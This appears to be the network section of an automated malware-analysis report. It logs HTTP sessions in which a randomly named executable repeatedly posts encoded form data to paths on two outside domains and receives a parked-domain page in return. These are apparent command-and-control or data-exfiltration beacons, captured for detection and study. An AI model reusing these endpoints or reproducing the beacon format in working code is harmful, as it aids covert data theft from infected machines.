                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_E4KFXlk2WU9szBj1IF15PgJ+Y+XxnFUTZGm7MLkMvSH+hdObrnIUW/GtVvJvYAkDw3ynrF5alIezhoJrt2SWBg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                      Sep 22, 2024 17:36:01.381926060 CEST903INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2YyODY2OTYtMjI1ZC00MWU5LTkwNGUtYjllMzJiYjIzM2JjIiwicGFnZV90aW1lIjoxNzI3MDE5Mz


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.124971984.32.84.32804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:16.502476931 CEST847OUTPOST /vjx2/ HTTP/1.1
                                      Host: www.pakmartcentral.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.pakmartcentral.shop
                                      Referer: http://www.pakmartcentral.shop/vjx2/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 77 59 79 65 64 76 76 4d 53 41 77 33 6c 43 51 4c 34 61 6e 47 2b 5a 33 68 41 55 78 64 63 32 76 4b 69 45 78 6a 70 30 72 6d 71 47 33 6d 42 49 2f 4e 59 79 43 35 36 57 6e 54 77 37 58 79 52 66 65 74 4c 6e 6e 49 6c 2f 76 62 78 6a 52 4e 50 34 72 43 63 49 42 74 4d 54 55 31 6c 2b 5a 6c 47 4b 4d 2b 2f 69 36 2f 68 72 51 74 46 4d 6d 39 39 59 6e 76 42 44 70 64 4f 52 72 65 70 47 33 4e 48 43 59 6d 70 48 4a 55 31 6d 4d 50 53 61 59 61 33 63 36 74 66 56 47 6c 51 5a 76 51 56 78 6c 50 63 6a 72 30 41 6f 4e 6f 78 4b 59 6a 59 56 6b 2f 43 46 61 74 53 78 76 67 6f 47 76 76 78 4d 4c 50 4b 6b 5a 51 43 67 3d 3d
                                      Data Ascii: H2y4Q2Q8=wYyedvvMSAw3lCQL4anG+Z3hAUxdc2vKiExjp0rmqG3mBI/NYyC56WnTw7XyRfetLnnIl/vbxjRNP4rCcIBtMTU1l+ZlGKM+/i6/hrQtFMm99YnvBDpdORrepG3NHCYmpHJU1mMPSaYa3c6tfVGlQZvQVxlPcjr0AoNoxKYjYVk/CFatSxvgoGvvxMLPKkZQCg==


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.124972084.32.84.32804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:19.058093071 CEST867OUTPOST /vjx2/ HTTP/1.1
                                      Host: www.pakmartcentral.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.pakmartcentral.shop
                                      Referer: http://www.pakmartcentral.shop/vjx2/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 77 59 79 65 64 76 76 4d 53 41 77 33 6d 6a 67 4c 36 39 7a 47 34 35 33 6d 4c 30 78 64 48 47 76 77 69 46 4e 6a 70 32 48 32 70 30 54 6d 42 70 6a 4e 5a 7a 43 35 71 47 6e 54 2f 62 58 33 66 2f 65 6d 4c 6e 71 31 6c 39 37 62 78 6a 56 4e 50 39 48 43 63 34 39 75 4e 44 55 33 39 4f 5a 6e 49 71 4d 2b 2f 69 36 2f 68 76 35 47 46 4e 4f 39 39 6f 33 76 42 68 42 63 51 42 72 64 75 47 33 4e 44 43 59 71 70 48 4a 36 31 6d 38 6c 53 63 55 61 33 64 4b 74 65 45 47 6d 5a 5a 76 65 5a 68 6b 74 54 77 57 44 45 6f 52 66 36 63 63 4d 55 6e 49 34 48 44 4c 33 4e 44 6e 32 39 46 37 69 38 62 79 2f 48 6e 6b 5a 5a 72 45 56 32 44 65 69 50 64 33 37 69 6a 62 4a 45 67 41 4c 46 35 49 3d
                                      Data Ascii: H2y4Q2Q8=wYyedvvMSAw3mjgL69zG453mL0xdHGvwiFNjp2H2p0TmBpjNZzC5qGnT/bX3f/emLnq1l97bxjVNP9HCc49uNDU39OZnIqM+/i6/hv5GFNO99o3vBhBcQBrduG3NDCYqpHJ61m8lScUa3dKteEGmZZveZhktTwWDEoRf6ccMUnI4HDL3NDn29F7i8by/HnkZZrEV2DeiPd37ijbJEgALF5I=


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.124972184.32.84.32804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:21.656411886 CEST1880OUTPOST /vjx2/ HTTP/1.1
                                      Host: www.pakmartcentral.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.pakmartcentral.shop
                                      Referer: http://www.pakmartcentral.shop/vjx2/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 77 59 79 65 64 76 76 4d 53 41 77 33 6d 6a 67 4c 36 39 7a 47 34 35 33 6d 4c 30 78 64 48 47 76 77 69 46 4e 6a 70 32 48 32 70 30 62 6d 43 62 72 4e 59 51 36 35 70 47 6e 54 68 4c 58 32 66 2f 65 42 4c 6b 62 2b 6c 39 32 73 78 67 39 4e 4e 62 54 43 4e 37 6c 75 43 44 55 33 30 75 5a 6d 47 4b 4e 6d 2f 69 71 37 68 72 64 47 46 4e 4f 39 39 72 66 76 49 54 70 63 53 42 72 65 70 47 32 4d 48 43 59 4f 70 45 34 48 31 6e 4a 53 53 73 30 61 33 39 61 74 64 33 75 6d 57 5a 76 63 61 68 6b 4c 54 77 61 63 45 6f 4e 70 36 63 41 6d 55 6d 38 34 48 6b 6d 77 61 77 2f 72 6a 47 66 65 76 4a 57 73 50 6b 4d 4f 51 73 49 68 7a 79 79 6b 4d 34 48 61 70 68 47 62 63 31 49 33 54 2b 6d 70 72 58 78 49 65 57 4c 53 4e 65 64 4a 50 43 36 2f 69 57 34 61 59 63 4d 58 36 58 31 4e 69 38 66 41 61 74 65 38 68 65 37 34 5a 4a 78 45 65 6d 72 68 39 57 78 30 34 55 53 36 65 35 6a 71 63 43 79 39 77 4d 54 54 45 4c 79 47 49 47 59 2b 4c 61 31 61 70 72 67 56 2b 71 4e 6c 69 45 79 74 45 53 4d 70 4a 48 67 49 36 4d 42 33 6e 57 7a 30 47 63 74 36 64 [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=wYyedvvMSAw3mjgL69zG453mL0xdHGvwiFNjp2H2p0bmCbrNYQ65pGnThLX2f/eBLkb+l92sxg9NNbTCN7luCDU30uZmGKNm/iq7hrdGFNO99rfvITpcSBrepG2MHCYOpE4H1nJSSs0a39atd3umWZvcahkLTwacEoNp6cAmUm84Hkmwaw/rjGfevJWsPkMOQsIhzyykM4HaphGbc1I3T+mprXxIeWLSNedJPC6/iW4aYcMX6X1Ni8fAate8he74ZJxEemrh9Wx04US6e5jqcCy9wMTTELyGIGY+La1aprgV+qNliEytESMpJHgI6MB3nWz0Gct6djocVHfjo2B1Sp7hfcMXvNnJ7pJCenYyHR4qX0yPQuy756cofPphpQMnyaOTAcGKyfTJuKmh7QvSCmEbv1lnQnpw4UMFrrEPo0sI1/TSDMGR5wH+srlMktxoiHnE+0xK2nryVO197VxfHnEWEMQ/MXLrYHhc9MdejLO7JFzXQA2XdD2nahugf8t3EEbXbwZrY3uADmG3Xju2y7z7OAeSmTrykXVp8jYLdZQs8yZ2AbSigHVZiWgz8lbhQ6bMSv8yGK6U6ZsFA7APnSBK3aJ93QNWeX/eLKY8k2ywBpbEpnNvucai6i5jk5J9fgyjal+k7Z2GjiTYb6+iFJVKIipzdiEBhVJZYRQ5NiIkLiVLUsVcS2yIYW7xz4EuqFrkQaKbFZBhiyIfeidkmo+3gu9NcXqqa8LT0BuGmGv7FWsM6QqvWzyDzALO61fM8o+DJNnMOeZE9CcejVokllZjzmBS+UdiD8P0XdFZQl+tHp9UCISq9qWnET4Sn+/6NGmzA4niaTlZx5JKTeaHd4ZuILPQJXfHJoaCIOS2JvW9EMEJ+um5k3lVChbIv7H+5AZt0DvnARfrdFmPqQAzhS/hWlfOFrRdEFAAoB0T04d8KPtopPj9xj9Fn0FzpJXYRo5E+dRPEotT+AsYXboQLe8xLpf8kfknTT2vB00QRTE [TRUNCATED]


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.124972284.32.84.32804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:24.199644089 CEST561OUTGET /vjx2/?H2y4Q2Q8=9aa+ebD5OTE0lBkm4Kjh493Ja3hDWXzPkU1zrWX+7QP9IJ+JaTmo4ECV77f2d/uDA3HyxannnyxFIZeVcaZYE0A0z8ljIos92WGKr+w0G6nn5qOoDhBTaUg=&Bz=dVmT HTTP/1.1
                                      Host: www.pakmartcentral.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:36:24.650161028 CEST1236INHTTP/1.1 200 OK
                                      Server: hcdn
                                      Date: Sun, 22 Sep 2024 15:36:24 GMT
                                      Content-Type: text/html
                                      Content-Length: 10072
                                      Connection: close
                                      Vary: Accept-Encoding
                                      alt-svc: h3=":443"; ma=86400
                                      x-hcdn-request-id: a02a2369cb6a0b0f670e181e4e2199b5-bos-edge3
                                      Expires: Sun, 22 Sep 2024 15:36:23 GMT
                                      Cache-Control: no-cache
                                      Accept-Ranges: bytes
                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                      Sep 22, 2024 17:36:24.650187016 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                      Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                      Sep 22, 2024 17:36:24.650197029 CEST448INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                      Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                      Sep 22, 2024 17:36:24.650239944 CEST1236INData Raw: 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69
                                      Data Ascii: e;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.section-title{color:#2f1c6a;f
                                      Sep 22, 2024 17:36:24.650279999 CEST1236INData Raw: 78 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b
                                      Data Ascii: x}.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-44" async></script><scri
                                      Sep 22, 2024 17:36:24.650290966 CEST1236INData Raw: 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 61 66 66 69 6c 69 61 74 65 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 75 73
                                      Data Ascii: s://www.hostinger.com/affiliates rel=nofollow><i aria-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"></i> Login</a></li></ul><
                                      Sep 22, 2024 17:36:24.650304079 CEST1236INData Raw: 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 41 64 64 20 77 65 62 73 69 74 65 20 74 6f 20 79 6f 75 72 20 68 6f 73 74 69 6e 67
                                      Data Ascii: wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article below to add your domain at Hostinger.</p><br><a href=https://support.hostinger.co
                                      Sep 22, 2024 17:36:24.650402069 CEST1236INData Raw: 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d 35 36 33 32 30 7c 31 30 32 33 26 72 29 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72
                                      Data Ascii: 36,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;for(r=n?Math.floor(r/700):r>>1
                                      Sep 22, 2024 17:36:24.650420904 CEST1236INData Raw: 65 28 6d 5b 66 5d 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63
                                      Data Ascii: e(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,
                                      Sep 22, 2024 17:36:24.650434971 CEST76INData Raw: 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 70 61 74 68 4e 61 6d 65 29 3c 2f 73 63 72 69 70 74 3e
                                      Data Ascii: mentById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.12497233.33.130.190804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:29.707791090 CEST850OUTPOST /2n2j/ HTTP/1.1
                                      Host: www.aposentandolegal.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.aposentandolegal.com
                                      Referer: http://www.aposentandolegal.com/2n2j/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 75 71 74 4d 2f 66 6f 34 4e 42 73 43 48 79 46 54 44 74 57 42 59 45 69 30 53 72 6d 65 6f 78 76 68 69 30 4a 63 6f 54 77 56 2f 56 5a 5a 74 62 6f 74 53 34 63 4e 45 6d 51 7a 68 68 47 46 4f 43 71 63 6d 54 4e 35 2f 37 53 65 52 71 35 4f 4b 53 59 6f 67 41 45 47 5a 47 4f 58 7a 63 37 32 31 73 2f 4c 4b 41 4d 44 31 74 4b 64 70 37 6c 32 50 32 56 6e 46 68 76 54 31 46 50 6c 58 42 6f 68 4f 62 44 49 48 53 2b 47 4b 33 35 55 49 66 69 67 61 78 76 4b 74 76 79 55 65 65 52 71 7a 57 4d 77 71 36 56 73 54 4c 48 6b 2f 4a 57 45 6d 49 64 57 2f 59 32 51 73 73 2b 4d 73 72 69 49 71 4b 65 34 69 66 6b 44 6e 77 3d 3d
                                      Data Ascii: H2y4Q2Q8=uqtM/fo4NBsCHyFTDtWBYEi0Srmeoxvhi0JcoTwV/VZZtbotS4cNEmQzhhGFOCqcmTN5/7SeRq5OKSYogAEGZGOXzc721s/LKAMD1tKdp7l2P2VnFhvT1FPlXBohObDIHS+GK35UIfigaxvKtvyUeeRqzWMwq6VsTLHk/JWEmIdW/Y2Qss+MsriIqKe4ifkDnw==


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.12497243.33.130.190804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:32.254132986 CEST870OUTPOST /2n2j/ HTTP/1.1
                                      Host: www.aposentandolegal.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.aposentandolegal.com
                                      Referer: http://www.aposentandolegal.com/2n2j/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 75 71 74 4d 2f 66 6f 34 4e 42 73 43 47 53 56 54 42 4b 43 42 54 45 69 33 65 4c 6d 65 6d 52 76 6c 69 30 31 63 6f 51 39 4e 2f 6e 74 5a 75 37 59 74 54 35 63 4e 48 6d 51 7a 71 42 48 4f 41 69 71 58 6d 54 51 47 2f 36 75 65 52 71 74 4f 4b 54 6f 6f 67 7a 63 46 4c 6d 4f 56 38 38 37 34 34 4d 2f 4c 4b 41 4d 44 31 74 4f 6b 70 2f 78 32 4d 48 6c 6e 45 41 76 55 70 56 50 6d 65 68 6f 68 4b 62 44 4d 48 53 2b 6b 4b 32 6b 7a 49 64 71 67 61 78 2f 4b 73 37 65 56 4c 4f 52 73 75 47 4e 54 37 2f 67 46 64 72 7a 35 31 59 61 38 74 70 56 67 7a 2b 6e 4b 7a 65 32 61 35 6f 32 46 6e 64 6e 49 76 63 5a 4b 38 39 66 34 6e 34 79 4b 70 4a 62 56 4d 4b 42 58 6a 4d 4b 63 41 64 77 3d
                                      Data Ascii: H2y4Q2Q8=uqtM/fo4NBsCGSVTBKCBTEi3eLmemRvli01coQ9N/ntZu7YtT5cNHmQzqBHOAiqXmTQG/6ueRqtOKToogzcFLmOV88744M/LKAMD1tOkp/x2MHlnEAvUpVPmehohKbDMHS+kK2kzIdqgax/Ks7eVLORsuGNT7/gFdrz51Ya8tpVgz+nKze2a5o2FndnIvcZK89f4n4yKpJbVMKBXjMKcAdw=


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.12497253.33.130.190804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:36:34.798419952 CEST1883OUTPOST /2n2j/ HTTP/1.1
                                      Host: www.aposentandolegal.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.aposentandolegal.com
                                      Referer: http://www.aposentandolegal.com/2n2j/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 75 71 74 4d 2f 66 6f 34 4e 42 73 43 47 53 56 54 42 4b 43 42 54 45 69 33 65 4c 6d 65 6d 52 76 6c 69 30 31 63 6f 51 39 4e 2f 6e 31 5a 74 49 51 74 53 61 45 4e 47 6d 51 7a 6e 68 48 4e 41 69 71 77 6d 54 49 4b 2f 36 69 4f 52 73 68 4f 49 77 67 6f 69 47 6f 46 53 57 4f 56 33 63 37 35 31 73 2f 6b 4b 44 6b 48 31 74 65 6b 70 2f 78 32 4d 45 39 6e 51 68 76 55 35 6c 50 6c 58 42 6f 6c 4f 62 44 6b 48 54 57 56 4b 31 4a 45 50 70 6d 67 66 68 50 4b 71 4f 79 56 57 2b 52 75 39 32 4e 31 37 2f 6b 65 64 72 66 31 31 59 2b 61 74 70 74 67 6a 34 4f 4d 73 38 2b 73 75 4c 36 42 71 4e 6e 34 6f 4c 68 58 38 36 48 44 30 76 32 55 6f 71 7a 32 49 62 51 59 32 63 65 2f 56 4e 5a 42 41 64 74 4c 68 6b 62 72 39 67 46 72 4c 53 47 47 77 6b 4f 32 56 4e 73 6c 71 6e 4a 5a 65 43 61 53 4a 68 73 37 31 54 41 4a 47 45 64 33 37 50 69 47 2f 39 52 69 30 72 42 68 74 5a 65 66 73 6e 6d 68 79 5a 69 77 78 6b 78 4c 72 66 41 63 45 32 5a 55 67 66 44 44 65 69 6d 6a 79 79 66 79 43 77 53 31 4a 59 45 45 36 77 64 41 48 52 47 34 36 62 33 64 73 [TRUNCATED]
